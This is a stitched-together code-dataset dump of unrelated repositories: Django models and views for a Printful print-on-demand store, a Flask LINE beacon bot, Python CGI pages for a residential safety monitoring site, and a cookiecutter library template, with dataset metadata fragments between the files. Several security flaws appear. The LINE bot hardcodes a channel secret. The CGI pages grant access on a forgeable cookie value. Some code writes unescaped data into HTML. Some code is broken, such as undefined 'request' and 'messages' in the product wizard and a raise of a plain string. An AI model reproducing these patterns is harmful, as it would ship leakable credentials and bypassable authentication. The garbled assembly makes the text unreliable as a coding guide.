# Fields
pid = IntegerField(_("Printful ID"), default=0)
phash = CharField(_("Hash"), max_length=255,
default="", blank=True, null=True)
url = CharField(_("URL"), max_length=255,
default="", blank=True, null=True)
filename = CharField(_("Filename"), max_length=255,
default="", blank=True, null=True)
size = IntegerField(_("Size"), default=0)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
dpi = IntegerField(_("DPI"), default=0)
created = CharField(_("Created"), max_length=255,
default="", blank=True, null=True)
thumbnail_url = CharField(
_("Thumbnail URL"), max_length=255, default="", blank=True, null=True)
preview_url = CharField(
_("Preview URL"), max_length=255, default="", blank=True, null=True)
visible = BooleanField(_("Visible"), default=False)
is_active = BooleanField(_("Active"), default=True)
# Relationship Fields
mime_type = ForeignKey("business.MimeType",
verbose_name="MIME Type", blank=True, null=True)
ptype = ForeignKey("business.pfFileType",
verbose_name="File Type", blank=True, null=True)
status = ForeignKey("business.pfFileStatus",
verbose_name="File Status", blank=True, null=True)
pfstore = models.ForeignKey('business.pfStore', verbose_name="Store")
filespec = models.ForeignKey(
'business.pfCatalogFileSpec', verbose_name="File Spec", blank=True, null=True)
class Meta:
ordering = ('-created',)
verbose_name = _("Printful File")
verbose_name_plural = _("Printful Files")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfprintfile_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfprintfile_update', args=(self.pk,))
def dimensions(self, dpi=300):
if self.width and self.height:
rv = '{}" x {}" / {}dpi'.format(
str(int(self.width / 300)),
str(int(self.height / 300)),
dpi,
)
else:
rv = "Unknown"
return rv
dimensions.short_description = "Dimensions"
@staticmethod
def api_pull(store=None):
"""
Update the file list from your Printful store.
:param store: pfStore object.
"""
if store:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
else:
raise("A pfStore object is required.")
# TODO Implement paging in this call.
logger.debug("pfPrintFile.api_pull / Making API Call")
files = api.get_file_list()
logger.debug("pfPrintFile.api_pull / All: is_active=False")
pfPrintFile.objects.all().update(is_active=False)
for p in files:
if p['mime_type']:
_mimetype, c = MimeType.objects.update_or_create(
name=p['mime_type'],
defaults={}
)
else:
_mimetype = None
if p['status']:
_status, c = pfFileStatus.objects.update_or_create(
name=p['status'],
defaults={}
)
else:
_status = None
if p['type']:
_ptype, c = pfFileType.objects.update_or_create(
name=p['type'],
defaults={}
)
else:
_ptype = None
pObj, pCreated = pfPrintFile.objects.update_or_create(
pid=p['id'],
pfstore=_storeObj,
defaults={
'is_active': True,
'phash': cleanValue(p['hash']),
'url': cleanValue(p['url']),
'filename': cleanValue(p['filename']),
'size': cleanValue(p['size'], 0),
'width': cleanValue(p['width'], 0),
'height': cleanValue(p['height'], 0),
'dpi': cleanValue(p['dpi'], 0),
'created': cleanValue(p['created']),
'thumbnail_url': cleanValue(p['thumbnail_url']),
'preview_url': cleanValue(p['preview_url']),
'visible': cleanValue(p['visible'], True),
'mime_type': _mimetype,
'status': _status,
'ptype': _ptype,
}
)
logger.debug("pfPrintFile.api_pull / {} {}", pCreated, pObj)
class pfAddress(commonBusinessModel):
# Fields
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
company = CharField(_("Company"), max_length=255,
default="", blank=True, null=True)
address1 = CharField(_("Address 1"), max_length=255,
default="", blank=True, null=True)
address2 = CharField(_("Address 2"), max_length=255,
default="", blank=True, null=True)
city = CharField(_("City"), max_length=255,
default="", blank=True, null=True)
state = ForeignKey("business.pfState", verbose_name=_(
"State"), blank=True, null=True)
country = ForeignKey("business.pfCountry", verbose_name=_(
"Country"), blank=True, null=True)
zip = CharField(_("Postal Code"), max_length=24,
default="", blank=True, null=True)
phone = CharField(_("Phone"), max_length=24,
default="", blank=True, null=True)
email = EmailField(_("Email"), default="", blank=True, null=True)
class Meta:
ordering = ('name',)
verbose_name = _("Address")
verbose_name_plural = _("Addresses")
def __str__(self):
if self.name and self.company:
return ", ".join([self.name, self.company])
return "Unnamed Address"
def asHTML(self):
"""
Returns an HTML div, formatted in a 'standard' way:
Name
Company
Address1
Address2
Zip City, State
Country
Tel: <Phone>
E-Mail: <Email>
"""
rv = []
rv.append("<div class='element-address'>")
if self.name:
rv.append(self.name + "<br/>")
if self.company:
rv.append(self.company + "<br/>")
if self.address1:
rv.append(self.address1 + "<br/>")
if self.address2:
rv.append(self.address2 + "<br/>")
if self.zip:
rv.append(self.zip + " ")
if self.city:
rv.append(self.city + ", ")
if self.state:
rv.append(self.state.code)
if self.country:
rv.append("<br/>" + self.country.name)
if self.phone:
rv.append("<br/>Tel: " + self.phone)
if self.email:
rv.append(
"<br/>Email: <a href='mailto:[]'>[]</a>".replace('[]', self.email))
rv.append("</div>")
return "".join(rv)
```
#### File: business/views/app_product.py
```python
from django.core.urlresolvers import reverse, reverse_lazy
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.shortcuts import render
from django.views import View
from django.views.generic.base import TemplateView
from django.views.generic import DetailView, ListView, UpdateView, CreateView
from django_tables2 import *
from business.models import *
from business.forms import *
from business.tables import *
from business.helper_backend import commonListView
class appProductCommonListView(commonListView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductCommonUpdateView(commonUpdateView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductCommonCreateView(commonCreateView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductHome(TemplateView):
template_name = "app_product/home.html"
def get_context_data(self, **kwargs):
context = super(appProductHome, self).get_context_data(**kwargs)
context['active_app'] = "product"
context['active_apptitle'] = "Product Catalog"
context['products'] = bzProduct.objects.all()
if context['products']:
try:
if 'product' in self.kwargs:
context['active_product'] = bzProduct.objects.get(
pk=self.kwargs['product'])
else:
context['active_product'] = context['products'][0]
except ObjectDoesNotExist:
context['active_product'] = context['products'][0]
context['table_variants'] = bzProductVariantTable(
bzProductVariant.objects.filter(
bzproduct=context['active_product'])
)
return context
class appProductDetail(TemplateView):
template_name = "app_product/product_detail.html"
model = bzProduct
# class appProductCreate(CreateView):
# model = bzProduct
# form_class = bzProductForm
# template_name = "business/object_form.html"
# success_url = reverse_lazy('business:app_product_home')
#
# def get_context_data(self, **kwargs):
# context = super(appProductCreate,
# self).get_context_data(**kwargs)
# context['mode'] = "create"
# context['active_app'] = "product"
# context['object_name'] = "Product"
# context['active_apptitle'] = "Product Catalog"
# context['action_list'] = reverse('business:app_product_home')
# return context
class appProductUpdate(appProductCommonUpdateView):
model = bzProduct
form_class = bzProductForm
template_name = "business/object_form.html"
success_url = reverse_lazy('business:app_product_home')
def get_context_data(self, **kwargs):
context = super(appProductUpdate,
self).get_context_data(**kwargs)
context['mode'] = "update"
context['action_list'] = reverse('business:app_product_home')
return context
```
#### File: business/wizards/bzProductCreate.py
```python
from __future__ import unicode_literals
from django import forms
from crispy_forms.helper import *
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django.contrib.auth import get_user_model
from business.models import *
from business.forms import *
from crispy_unforms.layout import *
from formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponse
from django.shortcuts import redirect
class bzProductFormWizard_step1(businessCommonForm):
"""
bzProductFormWizard. Step 1.
Collects the name, code (SKU base), design and Vendor Product from the user.
"""
form_layout = Layout(
Div(
HTML("""<h4>Step 1</h4>
<p>Lorem.</p>"""),
css_class="col-md-4"
),
Div(
Fieldset("",
"code",
"name"),
css_class="col-md-3"
),
Div(
Fieldset("", "bzDesign", "pfProduct"),
css_class="col-md-4"
),
)
class Meta:
model = bzProduct
fields = ['code', 'name', 'bzDesign', 'pfProduct', ]
class bzProductFormWizard_step2(businessCommonForm):
"""
bzProductFormWizard. Step 1.
Assign colors and sizes
"""
form_layout = Layout(
Div(
HTML("""<h4>Step 2: Variant Matrix</h4>
<p>You are creating a {{ wizard.form.pfProduct }}. Now, choose the combination of colors and sizes that you'd like to offer for this product.</p>"""),
css_class="col-md-4"
),
Div(
Field('colors', css_class='chosen',),
css_class="col-md-4"
),
Div(
Field('sizes', css_class='chosen',),
css_class="col-md-4"
),
)
class Meta:
model = bzProduct
fields = ['colors', 'sizes']
class bzProductFormWizard_step3(businessCommonForm):
"""
bzProductFormWizard. Step 3.
Confirms bzRenderings & Publish
"""
form_layout = Layout(
HTML("Step 3")
)
class Meta:
model = bzProduct
fields = []
class bzProductFormWizard(SessionWizardView):
form_list = [
bzProductFormWizard_step1,
bzProductFormWizard_step2,
bzProductFormWizard_step3
]
template_name = "business/object_form.html"
def get_context_data(self, **kwargs):
context = super(bzProductFormWizard,
self).get_context_data(**kwargs)
context['mode'] = "create"
context['active_app'] = "product"
context['active_apptitle'] = "Product Catalog"
context['object_name'] = "Product"
context['object_icon'] = "sunglasses"
context['action_list_label'] = "Back to List"
context['wizardstepcount'] = range(1, self.steps.count + 1)
context['action_list'] = reverse_lazy('business:app_product_home')
# if self.steps.step1 == 1:
# self.fields['sizes'] =
# self.fields['employee'].queryset = Employee.objects.filter(project_id=self.instance.project_id)
#
if self.steps.count > self.steps.step1:
context['action_list_save_label'] = "Next"
return context
def get_form_initial(self, step):
initial = {}
if step == '1': # (Step 2 - zero based)
# pfCP = self.storage.request['0-pfProduct']
data = self.storage.get_step_data('0')
pfCP = data.get('0-pfProduct', "")
if pfCP:
obj = pfCatalogProduct.objects.get(id=pfCP)
initial['colors'] = pfCatalogProduct.get_avail_colors(obj)
initial['sizes'] = pfCatalogProduct.get_avail_sizes(obj)
return self.initial_dict.get(step, initial)
def process_step(self, form):
if self.steps.step1 == 1:
pass
# if(form['pfProduct']):
# print("YEP")
# print(type(form))
# print(pfCatalogProduct.get_avail_sizes(form['pfProduct']))
elif self.steps.step1 == 2:
pass
elif self.steps.step1 == 3:
pass
return self.get_form_step_data(form)
def done(self, form_list, form_dict, **kwargs):
# data = [form.cleaned_data for form in form_list],
try:
instance = bzProduct()
for form in form_list:
for field, value in form.cleaned_data.items():
setattr(instance, field, value)
instance.save()
messages.add_message(request, messages.SUCCESS,
'Created new product: {}.'.format(instance))
except Exception as e:
messages.add_message(
request, messages.ERROR, 'An error occurred when trying to create a new product. {}'.format(e))
return redirect('business:app_product_home')
``` |
{
"source": "5610110083/ppap",
"score": 2
} |
#### File: 5610110083/ppap/app.py
```python
from __future__ import unicode_literals
import os
import sys
import time
from argparse import ArgumentParser
from flask import Flask, request, abort
from linebot import (
LineBotApi, WebhookParser, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, TextSendMessage,
SourceUser, SourceGroup, SourceRoom,
TemplateSendMessage, ConfirmTemplate, MessageTemplateAction,
ButtonsTemplate, URITemplateAction, PostbackTemplateAction,
CarouselTemplate, CarouselColumn, PostbackEvent,
StickerMessage, StickerSendMessage, LocationMessage, LocationSendMessage,
ImageMessage, VideoMessage, AudioMessage,
UnfollowEvent, FollowEvent, JoinEvent, LeaveEvent, BeaconEvent, ImagemapSendMessage, BaseSize, URIImagemapAction, MessageImagemapAction, ImagemapArea
)
app = Flask(__name__)
# get channel_secret and channel_access_token from your environment variable
#channel_secret = os.getenv('LINE_CHANNEL_SECRET', None)
#channel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)
channel_secret = '4fa72238672c25a970d378eb364ac3af'
channel_access_token = '<KEY>
if channel_secret is None:
print('Specify LINE_CHANNEL_SECRET as environment variable.')
sys.exit(1)
if channel_access_token is None:
print('Specify LINE_CHANNEL_ACCESS_TOKEN as environment variable.')
sys.exit(1)
line_bot_api = LineBotApi(channel_access_token)
parser = WebhookParser(channel_secret)
@app.route("/callback", methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# parse webhook body
try:
events = parser.parse(body, signature)
except InvalidSignatureError:
abort(400)
# if event is MessageEvent and message is TextMessage, then echo text
for event in events:
if event.beacon.type == 'enter':
time.sleep(3)
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="สวัสดี\nhttp://amzn.asia/cmpStQk")
)
"""
line_bot_api.reply_message(
event.reply_token,
ImagemapSendMessage(
base_url='https://www.dropbox.com/s/g2x56fis4wtfzin/31Yi8xKclrL.jpg?dl=0',
alt_text='あなたのトイレです。',
base_size=BaseSize(height=1040, width=1040),
actions=[
URIImagemapAction(
link_uri='http://amzn.asia/cmpStQk',
area=ImagemapArea(
x=0, y=0, width=520, height=1040
)
),
MessageImagemapAction(
text='hello',
area=ImagemapArea(
x=520, y=0, width=520, height=1040
)
)
]
)
)
"""
if not isinstance(event, MessageEvent):
continue
if not isinstance(event.message, TextMessage):
continue
'''
if event.type == 'message':
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="Beacon")
)
'''
'''
@handler.add(BeaconEvent)
def handle_beacon(event):
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text='Got beacon event. hwid=' + event.beacon.hwid))
'''
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="HEY")
)
return 'OK'
if __name__ == "__main__":
arg_parser = ArgumentParser(
usage='Usage: python ' + __file__ + ' [--port 80] [--help]'
)
arg_parser.add_argument('-p', '--port', default=8000, help='port')
arg_parser.add_argument('-d', '--debug', default=False, help='debug')
options = arg_parser.parse_args()
print 'OK'
app.run(debug=options.debug, port=options.port)
``` |
{
"source": "5610110083/Safety-in-residential-project",
"score": 3
} |
#### File: cgi-bin/any/readLog.py
```python
print("Content-type: text/html")
print("")
print("<html><head>")
print("")
print("</head><body>")
print("Hello from Python.")
infile = r"alert.log"
with open(infile) as f:
f = f.readlines()
def readLog():
for line in f:
line = '<p>'+line+'</p>'
print line
readLog()
print("</body></html>")
```
#### File: cgi-bin/any/Report_to_server.py
```python
import requests
import urllib
def sent_data(value):
# Login
url = 'http://siczones.coe.psu.ac.th/cgi-bin/UploadThingSpeakWithSensor.py'
values = {'key': 'abcd',
'Field4': value}
try:
r = requests.post(url, data=values)
#print r.content
print 'Report to server success'
except:
print 'Report to server failed.'
########################################################################
#scan input
print '============ Powered by Siczones ============'
sent_data(4)
########################################################################
```
#### File: cgi-bin/any/tmp.py
```python
import cgi, cgitb
import Cookie, os, time
form = cgi.FieldStorage()
device1 = form.getvalue('device1')
if device1 is None:
device1 = 'on'
cookie = Cookie.SimpleCookie()
cookie_string = os.environ.get('HTTP_COOKIE')
def getCookies():
if not cookie_string:
return False
else:
# load() parses the cookie string
cookie.load(cookie_string)
# Use the value attribute of the cookie to get it
txt = str(cookie['login'].value)
if txt == 'success':
return True
else:
return False
if getCookies() == False:
print 'Content-Type: text/html\n'
print '<html><head>'
homeIP = 'siczones.coe.psu.ac.th'
print ('''<meta http-equiv="refresh" content="0.1;http://%s">'''%(homeIP))
print '</head></html>'
else:
print ("Content-type:text/html\r\n\r\n")
print ('''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Welcome to server</title>
<link href="../favicon.ico" rel="icon" type="image/x-icon"/>
<link href="../favicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- This file has been downloaded from Bootsnipp.com. Enjoy! -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
<!-- Theme CSS -->
<link href="../css/agency.css" rel="stylesheet">
<link href="../css/siczones.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
<script>
$(document).ready(function(){
$(window).scroll(function () {
if ($(this).scrollTop() > 50) {
$('#back-to-top').fadeIn();
} else {
$('#back-to-top').fadeOut();
}
});
// scroll body to 0px on click
$('#back-to-top').click(function () {
$('#back-to-top').tooltip('hide');
$('body,html').animate({
scrollTop: 0
}, 800);
return false;
});
$('#back-to-top').tooltip('show');
});
</script>
</head>''')
print ('''
<body>
<!-- ==================== Nav Tabs ======================= -->
<nav class="nav nav-tabs navbar-default navbar-fixed-top">
<div class = "container">
<ul class="nav nav-tabs">
<li role="presentation" class="active"><a href="index.py"><span class="glyphicon glyphicon-home"/> Home</a></li>
<li role="presentation"><a href="mode.py">Mode</a></li>
<li role="presentation" class="dropdown">
<a class="dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false">
Other<span class="caret"></span>
</a>
<ul class="dropdown-menu">
<li><a href="status.py">Status</a></li>
<li><a href="device.py">Device</a></li>
<li><a href="alert.py">Alert</a></li>
<li role="separator" class="divider"></li>
<li><a href="logout.py" onmouseover="style.color='red'" onmouseout="style.color='black'">Log out</a></li>
</ul>
</li>
</ul>
</div>
</nav>
<br><br><br>
<div class="container-fluid">
<div class="container">
<div class="row">
<div class="col-sm-4 col-md-3 col-xs-5">
<!-- <img src="/img/brand.png" width="50px" height="50px" alt="Brand" style="display: block; margin-left: auto; margin-right: auto;"> -->
<img src="/img/brand/Brand.png" style="max-height: 100px; display: block; margin-left: auto; margin-right: auto;" class="img-responsive" alt="Header">
<br>
</div>
<div class="col-sm-8 col-md-9 col-xxs-7">
<br>
<brand style="display: block; margin-left: auto; margin-right: auto;">
Safety in residential system
</brand>
<hr>
</div>
</div>
</div>
</div>
<!-- ========================== Nav Tabs ======================= -->
<div class = "container bg-all">
<div class="wrapper">''')
print ("</html>")
```
#### File: Safety-in-residential-project/cgi-bin/history2.py
```python
import cgi, cgitb
import Cookie, os, time
cookie = Cookie.SimpleCookie()
cookie_string = os.environ.get('HTTP_COOKIE')
def getCookies():
if not cookie_string:
return False
else:
# load() parses the cookie string
cookie.load(cookie_string)
# Use the value attribute of the cookie to get it
txt = str(cookie['login'].value)
if txt == 'success':
return True
else:
return False
def readLog():
infile = "../logfiles/alert.log"
with open(infile , "rU") as f:
f = f.readlines()
# print f
for line in f:
line = '<tr><td>'+line+'</td></tr>'
print line
##Uncomment test readLog
#readLog()
if getCookies() == False:
print 'Content-Type: text/html\n'
print '<html><head>'
homeIP = 'siczones.coe.psu.ac.th'
print ('''<meta http-equiv="refresh" content="0.1;http://%s">'''%(homeIP))
print '</head></html>'
else:
print ("Content-type:text/html\r\n\r\n")
print ('''<!DOCTYPE html>
<html lang="en">
<head>
<title>History</title>
<meta charset="utf-8">
<link href="../favicon.ico" rel="icon" type="image/x-icon"/>
<link href="../favicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- This file has been downloaded from Bootsnipp.com. Enjoy! -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
<!-- Theme CSS -->
<link href="../css/agency.css" rel="stylesheet">
<link href="../css/siczones.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script>
$(document).ready(function(){
$(window).scroll(function () {
if ($(this).scrollTop() > 50) {
$('#back-to-top').fadeIn();
} else {
$('#back-to-top').fadeOut();
}
});
// scroll body to 0px on click
$('#back-to-top').click(function () {
$('#back-to-top').tooltip('hide');
$('body,html').animate({
scrollTop: 0
}, 800);
return false;
});
$('#back-to-top').tooltip('show');
});
</script>
</head>''')
print ('''
<body>
<table class="table table-striped" >
<thead>
<tr>
<th>
<div ng-app="myApp" ng-controller="namesCtrl">
<p>Type a letter in the input field:</p>
<p><input type="text" ng-model="test"></p>
<ul>
<li ng-repeat="x in names | filter:test">
{{ x }}
</li>
</ul>
</div>
<script>
angular.module('myApp', []).controller('namesCtrl', function($scope) {
$scope.names = [
'Jani',
'Carl',
'Margareth',
];
});
</script>
</th>
</tr>
<tr>
<th><span> Date >>>>>>> Field : Value</span></th>
</tr>
</thead>
<tbody>
''')
readLog()
print ('''
</tbody>
</table>
</body>''')
print ("</html>")
```
#### File: cgi-bin/old/UploadThingSpeak.py
```python
import httplib, urllib
import time
from datetime import datetime
#Import modules for CGI handling
import cgi, cgitb
############ Upload to clound #################
sleep = 20 # how many seconds to sleep between posts to the channel (at least 20 second)
key = '<KEY>' # Thingspeak channel to update
#initial status
Active = 1
Alert = 0
Humidity = 0
Voice = 0
Light = 0
Fire = 0
Temp = 0
#Report Raspberry Pi internal temperature to Thingspeak Channel
def uploadThingSpeak(data,numField):
while True:
params = urllib.urlencode({('field%d'%(numField)): data, 'key':key })
headers = {"Content-typZZe": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn = httplib.HTTPConnection("api.thingspeak.com:80")
try:
conn.request("POST", "/update", params, headers)
response = conn.getresponse()
#print ('Field%s : %s' %(numField, data))
#print response.status #if show 200 is success
print 'Status :',response.reason
data = response.read()
conn.close()
except:
print "connection failed"
break
'''
def updateData():
global Active,Alert,Humidity,Voice ,Light,Fire,Temp
#Calculate CPU temperature of Raspberry Pi in Degrees C
temp = int(open('/sys/class/thermal/thermal_zone0/temp').read()) / 1e3 # Get Raspberry Pi CPU temp
Active = temp
Alert = 2
Humidity = 3
Voice = 4
Light = 5
Fire = 6
Temp = 7
#print ('updateData Active')
if __name__ == "__main__":
#while True:
print '=============================='
#Show time
print datetime.now().strftime('%Y-%m-%d %H:%M:%S')
updateData()
fields = [Active,Alert,Humidity,Voice,Light,Fire,Temp]
numField = 1
for data in fields:
uploadThingSpeak(data,numField)
numField = numField+1
'''
############################### HTML ##########################
# Create instance of FieldStorage
form = cgi.FieldStorage()
print ("Content-type:text/html\r\n\r\n")
print ("<html>")
print ("<head>")
print ("<title>UploadThingSpeak</title>")
print ("</head>")
print ("<body>")
print ("<center><fieldset><legend>Result !!</legend>")
print ("<h2>Welcome to Upload data to ThingSpeak</h2>")
i=1
Field=[]
while i<=7 :
# Get data from fields
Field.append(form.getvalue('Field%s'%(i)))
print ("<p>Field%s : %s" % (i,Field[i-1]))
if Field[i-1] is not None:
uploadThingSpeak(Field[i-1],i)
if (form.getvalue('Field%s'%(i+1)) is not None):
#sleep for desired amount of time
time.sleep(sleep)
i=i+1
print ('''<FORM><INPUT Type="button" VALUE="Back" onClick="history.go(-1);return true;"></FORM>''')
print ("</fieldset></center></body>")
print ("</html>")
```
#### File: 5610110083/Safety-in-residential-project/deploy.py
```python
from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
return '<h1>Deployed to Heroku ! ! !</h1>'
``` |
{
"source": "561546441/cookiecutter-rrpylibrary",
"score": 2
} |
#### File: cookiecutter-rrpylibrary/{{cookiecutter.project_slug}}/gitlint_extra_rules.py
```python
from gitlint.contrib.rules.conventional_commit import ConventionalCommit
class ConventionalCommit2(ConventionalCommit):
"""
Force ignore Merge commits
"""
id = "CT2"
def validate(self, line, _commit):
if line.startswith("Merge"):
return []
else:
return super(ConventionalCommit2, self).validate(line, _commit)
```
#### File: cookiecutter-rrpylibrary/{{cookiecutter.project_slug}}/setup.py
```python
import io
import os
import sys
# Python supported version checks. Keep right after stdlib imports to ensure we
# get a sensible error for older Python versions
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >= 3.6 required.")
from setuptools import find_packages, setup
{%- if cookiecutter.use_cython_to_protect_code == "y" %}
from setuptools.extension import Extension
{%- endif %}
import versioneer
{%- if cookiecutter.use_cython_to_protect_code == "y" %}
sources = ["src"]
exclude = ["__init__.py", "_version.py"]
extensions = []
py_modules = []
for source in sources:
for dir_path, folder_names, file_names in os.walk(source):
for file_name in file_names:
file_path = os.path.join(dir_path, file_name)
rel_path = os.path.relpath(file_path, "src")
file_name_no_ext = os.path.splitext(rel_path.replace(os.sep, "."))[0]
if file_name.endswith((".pyx", ".py")):
if file_name not in exclude:
extension = Extension(
file_name_no_ext,
sources=[file_path],
extra_compile_args=["-Os", "-g0"],
extra_link_args=["-Wl,--strip-all"],
)
extensions.append(extension)
else:
py_modules.append(file_name_no_ext)
{%- endif %}
def read(*names, **kwargs):
with io.open(
os.path.join(os.path.dirname(__file__), *names),
encoding=kwargs.get("encoding", "utf8"),
) as fh:
return fh.read()
readme = read("README.rst")
changelog = read("CHANGELOG.rst")
install_requires = [
# eg: "numpy==1.11.1", "six>=1.7",
]
extras_require = {
"dev": [
"black==20.8b1",
"isort==5.7.0",
"flake8==3.8.4",
"mypy==0.800",
"pre-commit~=2.10.0",
"pytest==6.2.2",
"pytest-cov==2.11.1",
"tox~=3.21.0",
"gitchangelog==3.0.4",
"invoke==1.5.0",
]
}
{%- set license_classifiers = {
"MIT license": "License :: OSI Approved :: MIT License",
"BSD license": "License :: OSI Approved :: BSD License",
"ISC license": "License :: OSI Approved :: ISC License (ISCL)",
"Apache Software License 2.0": "License :: OSI Approved :: Apache Software License",
"GNU General Public License v3": "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
} %}
def setup_package():
metadata = dict(
author="{{ cookiecutter.full_name.replace("\"", "\\\"") }}",
author_email="{{ cookiecutter.email }}",
python_requires=">=3.6",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
{%- if cookiecutter.open_source_license in license_classifiers %}
"{{ license_classifiers[cookiecutter.open_source_license] }}",
{%- endif %}
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
description="{{ cookiecutter.project_short_description }}",
install_requires=install_requires,
extras_require=extras_require,
{%- if cookiecutter.open_source_license in license_classifiers %}
license="{{ cookiecutter.open_source_license }}",
{%- endif %}
long_description=readme + "\n\n" + changelog,
include_package_data=True,
keywords="{{ cookiecutter.project_slug }}",
name="{{ cookiecutter.project_slug }}",
url="{{ cookiecutter.repo_protocol }}://{{ cookiecutter.repo_hosting_domain }}/{{ cookiecutter.repo_username }}/{{ cookiecutter.project_slug }}",
version=versioneer.get_version(),
package_dir={"": "src"},
zip_safe=False,
{%- if cookiecutter.use_cython_to_protect_code != "y" %}
cmdclass=versioneer.get_cmdclass(),
packages=find_packages("src"),
{%- endif %}
)
{%- if cookiecutter.use_cython_to_protect_code == "y" %}
args = sys.argv[1:]
build_command = ["build", "build_ext", "build_py", "bdist_wheel"]
run_build = False
for command in build_command:
if command in args:
run_build = True
if run_build:
from Cython.Build import build_ext, cythonize
from Cython.Compiler import Options
Options.docstrings = False
compiler_directives = {
"optimize.unpack_method_calls": False,
"always_allow_keywords": True,
}
metadata["ext_modules"] = cythonize(
extensions,
build_dir="build",
language_level=3,
compiler_directives=compiler_directives,
)
metadata["py_modules"] = py_modules
metadata["packages"] = []
cmdclass = versioneer.get_cmdclass({"build_ext": build_ext})
else:
cmdclass = versioneer.get_cmdclass()
metadata["packages"] = find_packages("src")
metadata["cmdclass"] = cmdclass
{%- endif %}
setup(**metadata)
if __name__ == "__main__":
setup_package()
```
#### File: src/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}.py
```python
def sample(s):
"""
* sample function for cookiecutter
:param s:
:return:
"""
return s
```
#### File: cookiecutter-rrpylibrary/hooks/post_gen_project.py
```python
import os
import shutil
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(filepath):
os.remove(os.path.join(PROJECT_DIRECTORY, filepath))
if __name__ == "__main__":
if "{{ cookiecutter.create_author_file }}" != "y":
remove_file("AUTHORS.rst")
remove_file("docs/authors.rst")
if "Not open source" == "{{ cookiecutter.open_source_license }}":
remove_file("LICENSE")
if "{{cookiecutter.sphinx_docs}}" != "y":
shutil.rmtree('docs')
if "{{cookiecutter.gitlab_ci}}" != "y":
remove_file(".gitlab-ci.yml")
print("""
################################################################################
################################################################################
You have successfully created `{{ cookiecutter.project_slug }}`.
################################################################################
You've used these cookiecutter parameters:
{% for key, value in cookiecutter.items()|sort %}
{{ "{0:30}".format(key + ":") }} {{ "{0!r}".format(value).strip("u") }}
{%- endfor %}
################################################################################
To get started run these:
cd {{ cookiecutter.project_name }}
# create virtualenv(recommend)
python3 -m venv venv
source venv/bin/activate
# install dependencies
pip install -U pip
pip install -e .[dev]
# auto init the repo by invoke command
inv init-repo
# Push to remote repo
git remote add origin git@{{ cookiecutter.repo_hosting_domain }}:{{ cookiecutter.repo_username }}/{{ cookiecutter.project_slug }}.git
git push -u origin master --tags
""")
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.